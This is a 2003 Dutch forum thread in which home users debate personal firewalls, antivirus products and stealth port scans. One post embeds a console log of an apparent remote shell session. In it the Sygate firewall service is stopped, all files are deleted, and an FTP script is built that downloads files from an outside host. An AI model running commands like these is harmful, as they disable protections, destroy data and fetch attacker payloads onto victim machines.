Wat is nou de perfecte firewall voor home users?

MrFish schreef op 07 June 2003 @ 21:28:
Mijn verbinding met de buitenwereld staat ook 24/7 open, en ik gebruik naar volle tenvredenheid BlackICE PC Protection. Das niet gratis, maar daar heeft de gemiddelde tweaker wel een oplossing voor

Verwijderd schreef op 07 June 2003 @ 21:39:
[...]

Dus hiermee wil jij dus zeggen dat de gemiddelde tweaker illegaal bezig is?
Ik wil niet de moraal ridder uithangen maar ik denk dat de serieuze tweaker juist wel wil betalen voor een programma die verrekte goed geprogrammeerd is.
Dergelijke programma's verdienen het gewoon om gesupport te worden door ze te kopen.
Bij de weg, mijn router heeft een firewall die alles dicht spijkerd en dat bevalt mij prima.

Pluk schreef op 07 juni 2003 @ 21:47:
Ik kreeg vandaag nog mijn complimentjes van iemand omdat mijn compu zo dicht zat. Hij had ff met nmap zitten checken.

Zowel op grc.com als op de symantec site ben ik volledig stealth. Dwz dat de scanners geen aanwijzing konden vinden of mijn comp uberhaupt wel bestond.

Windows Xp built-in firewall

blocked alleen ingaand verkeer trouwens. Maarja verstandig omgaan met email e.d. en je hebt nooit last van virussen trojans etc.

Croccifixio schreef op 07 June 2003 @ 21:49:
[...]


Hoe zit het met poort 80 bijvoorbeeld? Staat die niet op 'closed' of zo?

Meneer aard schreef op 07 June 2003 @ 21:19:
De verbinding staat 24 uur aan en daarom is een goede firewall vereist.

Pluk schreef op 07 June 2003 @ 21:47:
Ik kreeg vandaag nog mijn complimentjes van iemand omdat mijn compu zo dicht zat. Hij had ff met nmap zitten checken.

Zowel op grc.com als op de symantec site ben ik volledig stealth. Dwz dat de scanners geen aanwijzing konden vinden of mijn comp uberhaupt wel bestond.

Windows Xp built-in firewall

raphidae schreef op 07 juni 2003 @ 22:02:
[...]


Wat een onzin. De enige plek waar een firewall nodig is is aan de border van een net waar ingress/egress filtering gedaan wordt.

Net alsof het installeren van een 'personal firewall' een vervanging is voor het stoppen van services die je niet nodig hebt en het niet installeren van trojans

De vraag en reacties verbazen me echt. Ik zou bijna denken dat het computern00bs.net is hiero

Ruzor schreef op 07 June 2003 @ 22:16:
[...]

Hoe stel je die XP built-in firewall nou zo optimaal mogelijk (stealth) in?

sharkzor schreef op 07 June 2003 @ 22:19:
ik adviseer de meeste mensen gewoon geen firewall te installeren (dail-up, adsl/kabel met router)
zelf heb ik ook geen firewall voor mijn basic adsl met een vigor2600 router.

waarom zou je het nodig hebben? als je windows een beetje geupdate heb en je hebt een GOEDE virusscanner die je ook vaak update is er toch niks aan de hand? hoe moet men mij dan hacken?

en voor dail-up is het helemaal belachelijk aangezien de meeste nog geen half uur online zitten en een dynamisch ip hebben...

WARNING! No known virus protection software found. This means your computer and data are vulnerable to virus attacks. Virus attacks can have serious consequences, including system damage and data loss.

IceManX schreef op 07 June 2003 @ 23:47:
Bah. Net even symantecs scan eroverheen gegooid. En hoewel ik alweer een tijdje AVG draai, kreeg ik toch de volgende melding:
[...]
Slecht hoor! Die herkent zeker alleen maar norton??

Zelf heb ik trouwens zone alarm bovenop de ingebouwde firewall van mijn router. Alles stealth, helaas wel pingbaar

Brickman schreef op 07 June 2003 @ 22:38:
Norton Internet Security 2002

[ Voor 53% gewijzigd door Sir_Killalot op 08-06-2003 01:11 ]

BackSlash32 schreef op 07 June 2003 @ 22:29:
sharkzor, je staat verbaast als je zou zien hoeveel zooi ik in m'n logs aan scriptkiddie-scans en domme pogingen heb van dial-up hosts.

en geen firewall?
Je zit zelf al achter een NAT device, zou je niet iig een beetje beter je post willen verwoorden?

Verwijderd schreef op 07 June 2003 @ 22:43:
[...]

Een dynamisch IP heeft hier niets mee te maken. Dit IP verandert niet constant als je verbinding hebt. Enkel als je opnieuw verbinding maakt. Je zit dus wel degelijk een tijdlang met hetzelfde IP-adres, wat dus bewijst dat het helemaal niets uitmaakt, statisch of dynamisch.

[ Voor 33% gewijzigd door sharkzor op 08-06-2003 01:04 ]

Sir_Killalot schreef op 08 juni 2003 @ 00:54:
[...]


En de standaard firewall van XP alleen is niet genoeg, gevaarlijke poorten laat hij open staan en hij locked de poorten alleen en maakt ze niet 'onvindbaar' voor andere op het net

Pluk schreef op 08 juni 2003 @ 01:07:
[...]


Leg mij dan eens uit hoe het komt dat als ik door vrienden grc.com en symantec gescanned word dat ik dan wel stealth ben?

Zijn die scanners dan gewoon brak?

[ Voor 33% gewijzigd door lonkhuijzen op 08-06-2003 02:04 ]

Pluk schreef op 08 June 2003 @ 02:00:
Hmmm net even gekeken of het zou liggen aan dat ik mijn compu lekker heb getweaked.
Maar de ongetweakte pc van mijn vriendin is ook stealth.

http://nanoprobe.grc.com is zijn nieuwste scanner alleen is die nu ff down helaas.
Die checkt de eerste 1055 (zoiets) poorten .

Geen idee wat het verschil dan is tussen onze windows..
winXPpro sp1a hier Met firewall aan

Pluk schreef op 08 June 2003 @ 02:08:
Hahaha ik zat al te denken joh waarom mijn xp zo speciaal is dan
Doe voor de gein ff erbij blijkt het nog waar te zijn ook.

Nouja kan gebeuren

scan.sygate.com is idd wel een goeie, doet het erg grondig denk ik vanwege de 45 minuten voor een tcp scan.

RIKZ schreef op 08 June 2003 @ 00:45:
een firewal is niet noodzakkelijk. Zolang je een echte thuis gebruiker bent en dus geen services en andere fratsen hebt geinstalleerd is er dus niks om je zorgen over te maken. Zelf nooit gehacked geweest. Nooit problemen ondervonden.

en daarnaast een firewall scant alleen verkeer. En pas een hele geode scnt op inhoud van de data zelf dus of er een virus inzit of een trojan. En dat is dus ook geen taak van de firewall.. laatst zag ik, dacht kerio. of tiny... dat ze anit-virus ondersteuning hadden toegevoegd aan friewall en voor thuis gebruiker is dat heel handig..

Verwijderd schreef op 08 juni 2003 @ 00:07:
[...]


Alles stealth en toch te pingen bestaat dus niet want dan ben je niet stealth.
Stealth houd juist in dat er ook op een ping geen response komt.
Cq. je systeem reageert niet meer op ICMP messages.

Ping Reply: RECEIVED (FAILED) ? Your system REPLIED to our Ping (ICMP Echo) requests, making it visible on the Internet. Most personal firewalls can be configured to block, drop, and ignore such ping requests in order to better hide systems from hackers. This is highly recommended since "Ping" is among the oldest and most common methods used to locate systems prior to further exploitation.

[ Voor 13% gewijzigd door Zap op 08-06-2003 14:18 ]

[ Voor 3% gewijzigd door Fish op 08-06-2003 15:20 ]

[ Voor 24% gewijzigd door Scorpion1984 op 08-06-2003 16:04 ]

fish schreef op 08 juni 2003 @ 15:19:
mhoaw .. ik ben toch wel blij met die virusscanner hoor die grijpt af en toe wel es wat als ik aan het browsen ben.

als je dus op zo'n plek aankomt start ie dus een applicatie/applet die je niet vertrouwd die niet moet starten

zelf geef je aan precies te weten wat je doet, maar als je dat mischien niet weet/doet/wil dan doen is zo'n firewall wel prettig hoor.

[ Voor 9% gewijzigd door Zap op 08-06-2003 16:31 ]

Meneer aard schreef op 08 June 2003 @ 15:56:
[...]


..... Op dit moment heb ik de laatste zonealarm geinstalleerd bevalt perfect alleen zoals gezegd niet de volledige bandbreedte.

[ Voor 9% gewijzigd door Verwijderd op 08-06-2003 16:29 ]

Meneer aard schreef op 08 June 2003 @ 16:49:
[...]
toen ik voor het eerst deze firewall erop zette kwam ie niet hoog met de speedtest. Na verwijderen voledig. Maar ik vind dit een prachtige firewall.

zetje01 schreef op 08 June 2003 @ 16:59:
Ik gebruik Atguard. Die gebruikt geen resources, is klein, kost geen bandbreedte en is uitgebreid configureerbaar.
Alleen dat configureren duurt wel eventjes.

Sick Nick schreef op 08 juni 2003 @ 17:07:
gewoon de ingebakken firewall van je router, niemand komt je pc's meer binnen tenzij je het zelf open zet. Je hoeft geen extra progs meer te draaien die alleen maar gezeik kunnen geven.
Enige wat ie niet tegen houd is verkeer van binnenuit dus als jij geen goede anti-virus scanner draait en je hebt een trojan die een verbinding naar buiten maakt dan ben je wel dus lul. Of te wel, gewoon goede anti virus draaien.

Meneer aard schreef op 08 June 2003 @ 16:49:
[...]


toen ik voor het eerst deze firewall erop zette kwam ie niet hoog met de speedtest. Na verwijderen voledig. Maar ik vind dit een prachtige firewall.

Scorpion1984 schreef op 08 June 2003 @ 17:05:
[...]

Een firewall die bandbreedte zou kosten ? Nooit van gehoord, maar die zonealarm vindt ik persoonlijk kei slecht, de ouwe releases waren nog wel goed, maar die nieuwe is meer userinterface dan een goeie firewall.

Meneer aard schreef op 07 June 2003 @ 21:19:

[..]

ZoneAlarm: Is in mijn ogen een goede firewall maar laat niet de voledige bandbreedte toe, getest met speedtest.nl kwam ik uit op 39.6 kb. Na verwijderen probleem opgelost.

[..]

Wildfire schreef op 08 June 2003 @ 19:08:
[...]


Wat een onzin. Als dat echt zo was zou niemand ZoneAlarm gebruiken. Ik heb zelf al diverse incarnaties van ZoneAlarm gebruikt en met allen kon ik gewoon de max van mijn verbinding, 485 kilobyte/sec, halen.

Sir_Killalot schreef op 08 June 2003 @ 19:12:
[...]


Daarom, niks mis met ZA (Pro) dus

(behalve met 3.x en verder )

IceManX schreef op 08 juni 2003 @ 19:33:
[...]
Ikzelf heb ZA 3.1.395 (gratis versie), en gewoon snelheden tot zeker 300kB/s

Sir_Killalot schreef op 08 June 2003 @ 20:22:
[...]


Ik had het niet over snelheden maar over 3.x in het algemeen, bijna niemand vind het echt een verbetering tegenover 2.6, vooral omdat ze de hele interface hebben omgegooid

Zap schreef op 08 June 2003 @ 14:16:
Een outbound firewall heb ik niet nodig, ik weet wat ik doe en gebruik alleen programma's die ik vertrouw (kwestie van structureel en zorgvuldig te werk gaan, zorgen voor laatste patches etc.).

zetje01 schreef op 08 juni 2003 @ 19:04:
[...]


Wel even de hele thread lezen voor je reageert aub. Hier beweert namelijk een aantal mensen dat zonealarm ten koste gaat van hun bandbreedte...

zetje01 schreef op 08 juni 2003 @ 16:59:
Ik gebruik Atguard. Die gebruikt geen resources, is klein, kost geen bandbreedte en is uitgebreid configureerbaar.
Alleen dat configureren duurt wel eventjes.

Trunksmd schreef op 09 juni 2003 @ 13:30:
Ik heb hier 2 pc's staan. Eentje met windows 2000 server en norton antivirus profesional 8. De andere pc met win xp home en norton internet security 2003. Beiden staan achter een alcatel router, waarbij poort 21 en 80 continue openstaan voor de server. Msn-en, mailen en surfen doe ik via win xp. Downloaden en p2p doe ik via win 2000 server. Ik ben elke dag online en soms wel 24 uur (server meer). Ik heb nog nooit last gehad van virussen en trojanen. Deze zijn altijd netjes onderschept geworden. Wie zei hier dat Norton slecht was?

Scorperito schreef op 09 June 2003 @ 13:04:
Topic niet gelezen, maar ik kan jullie allemaal aanraden gewoon een up2date virusscanner te installeren en geen zogenaamde firewall.
Waarom? Hackers, zoals jullie ze noemen (scriptkiddies eigenlijk), die jullie willen hacken, gebruiken allemaal programmatjes die virusscanners tegenhouden, like trojans enzo...
Wanneer echte hackers aan het werk zijn, kost het 5 minuten meer om zonealarm, of een of ander huis tuin en keuken firewall te omzeilen.

Bovendien zijn echte hackers er niet op uit om huis tuin en keuken gebruikers lastig te vallen, ze proberen alleen maar grote bedrijfsnetwerken te hacken.

Wanneer je met een beetje inzicht ook even netbios uitschakelt in je tcp/ip instellingen, kunnen die scriptkiddies al helemaal niks beginnen.

[ Voor 10% gewijzigd door Verwijderd op 09-06-2003 14:30 ]

Verwijderd schreef op 09 June 2003 @ 13:55:
[...]

testje

Elke respectabale AV moet alle 4 de samples in deze zip vinden. Dit zijn de meest standaard unpackers die elke noob kan gebruiken.

Verwijderd schreef op 09 June 2003 @ 14:27:
[...]
Tja. Als jij een biertje koopt voor iedere 'tweaker' die dat niet heeft gedaan dan ben je morgen failliet. Denk je werkelijk dat al die mensen die dit soort topics posten netjes hun netbios beteugeld hebben? Laat staan die huis-tuin-en-keukengebruikers waar jij het over had.

[ Voor 60% gewijzigd door PipoDeClown op 09-06-2003 14:48 ]

PipoDeClown schreef op 09 juni 2003 @ 14:45:
[...]


Sophos 3.70 vind alleen de aspack versie niet, maar mail is al naar hen onderweg

Verwijderd schreef op 09 June 2003 @ 13:55:
[...]


Ik .

NAV vindt gemiddeld 5 op de 10 trojans...
En qua gewone virii is het ook niet meer zo geweldig, ze kunnen blij zijn als ze de top 8 halen.
Daarnaast zijn de unpackers sjrot(lees: zijn er niet).
De software is buggie.
Support is slecht.

testje

Elke respectabale AV moet alle 4 de samples in deze zip vinden. Dit zijn de meest standaard unpackers die elke noob kan gebruiken.

Trunksmd schreef op 09 juni 2003 @ 15:02:
[...]


Dit is wel een topic over firewalls. Maar om terug te komen op je opmerkingen. NIS2003 is (zover ik weet) de enige, die msn beveiligt. Ik heb nog nooit last van bugs gehad in de software en ik heb er weinig omkijken naar. De virusscanner is misschien niet de beste, maar hij houdt het belangrijkste toch tegen. Verder hangt het ook een beetje van jezelf af. Te onbekende sites blijf ik weg. NIS2003 houdt elke pop up en adje tegen. Mijn mail wordt door xs4all apart gefilterd en gescand (en vervolgens door norton nog eens). Mijn hoofpc met winxp daar ben ik ook voorzichtig mee. Die is dan ook vrij onzichtbaar op internet. Mijn server draait meer voor de lol en voor vrienden. Daar doe ik ook de meer onveilige zaken mee, zoals p2p en downloaden. Kijk je kunt je huis wel beveiligen tegen dieven, maar 100% zeker ben je nooit. (ik denk dat er genoeg tweakers op dit moment op dit forum zijn, die altijd bij je binnen kunnen komen) Je kunt het ze wel moeilijk maken.

RocketKoen schreef op 07 June 2003 @ 22:40:
Sygate Personal Firewall Pro
in en uitgaand verkeer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

Timeout occurred
C:\>

The command completed successfully.



C:\>net stop "Sygate Personal Firewall Pro"
net stop "Sygate Personal Firewall Pro"

The Sygate Personal Firewall Pro service is stopping..
The Sygate Personal Firewall Pro service was stopped successfully.


C:\>
C:\>

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC68-6D84

 Directory of C:\

06/10/2003  12:01a      <DIR>          .
06/10/2003  12:01a      <DIR>          ..
06/09/2003  11:59p                   0 TFTP1308
               1 File(s)              0 bytes
               2 Dir(s)   1,603,903,488 bytes free

C:\>del *.* /q/f
del *.* /q/f

C:\>echo open ******** >> echo.txt

echo user *******>> echo.txt

echo mget *.* >> echo.txt

echo quit  >> echo.txt

ftp -i -n -v -s:echo.txt
echo open 62.164.0.35 7978 >> echo.txt

C:\>
C:\>echo user sql sql >> echo.txt

C:\>
C:\>echo mget *.* >> echo.txt

C:\>
C:\>echo quit  >> echo.txt

C:\>
C:\>
ftp -i -n -v -s:echo.txt
Connected to ******.
open ****** ***
220-Serv-U FTP Server v3.0 for WinSock ready...
230 User logged in, proceed.

Jimbolino schreef op 09 juni 2003 @ 14:57:
De beste firewall is geen firewall: http://windowsupdate.microsoft.com

De beste virusscanner is geen virusscanner

Het beste windows optimizer / probleemoplosser / defrag-tool = format c:

Voor bedrijven kan ik het wel begrijpen dat ze een firewall aanschaffen. Maar thuis gebruikers... Volgens mij heb je alleen maar elende met dat ding, moet je aangeven wat er allemaal wel en niet door mag... en dan werkt een keer een spelletje over internet niet ofzo, en dan zet je je firewall tijdelijk uit...

De meeste firewalls zijn maar "schijn" protectie. Ze mogen dan misschien wel een paar dingen tegenhouden, maar als de gebruiker dan gewoon op ja klikt, kun je er als hacker toch gewoon in.

Ik heb vaak genoeg een screenshotje gezien van een pc met zonealarm/blackice/nis.
Om een pc te beheren moet je zoiezo voldoende kennis erover hebben, en niet zomaar op allerlei knoppen drukken zonder te weten wat het inhoud

Verwijderd schreef op 23 June 2003 @ 13:33:
BlackIce is de beste die er is,
je hoeft niks in te stellen. EN hij laat naar mijn ervaring nix door,

[ Voor 5% gewijzigd door Unicron op 23-06-2003 14:00 ]

Cyb schreef op 23 juni 2003 @ 15:48:
Heb nu een beta versie van Tiny Personal Firewall 5.

Ziet er goed uit, ga ik voorlopig gebruiken.

[ Voor 10% gewijzigd door Unicron op 23-06-2003 16:23 ]

Meneer aard schreef op 23 June 2003 @ 16:34:
Heb zonealarm er weer af gegooid. Blokkeerde zelfs mijn netwerk naar een andere pc.

Zodoende moest ik m`n hele modem op nieuw instellen.

[ Voor 14% gewijzigd door Unicron op 23-06-2003 16:46 ]

Verwijderd schreef op 23 June 2003 @ 17:09:
Je kunt zeggen wat je wil, maar een firewall voor je netwerk is echt geen overbodige luxe meer tegenwoordig. Ik krijg nog dagelijks requests binnen op m'n Apache webserver (draaiende onder Linux uiteraard) van Code Red achtige dingen. Mensen die proberen een DOS prompt te openen. Dat lukt natuurlijk niet, omdat Linux dat niet kent, maar 'k had er niet aan moeten denken wat er was gebeurt als mijn eigen computer (Windows XP) direct aan het internet had gehangen.

Brickman schreef op 07 June 2003 @ 22:38:
Norton Internet Security 2002

[ Voor 3% gewijzigd door TeazNutz op 25-06-2003 13:36 ]

MuddyMagical schreef op 25 June 2003 @ 13:56:
Sorry, hoor maar die scan op GRC.com stelt volgens mij helemaal niks voor. Ik heb net even een scan gedaan op een pc die hier via een isdnmodem aan het i-net staat. Er staat niks op van een antivirusscanner of firewall en toch geeft de scan aan dat alles 'Stealth' is.
Vindt je het erg als ik daar dus niet in geloof?!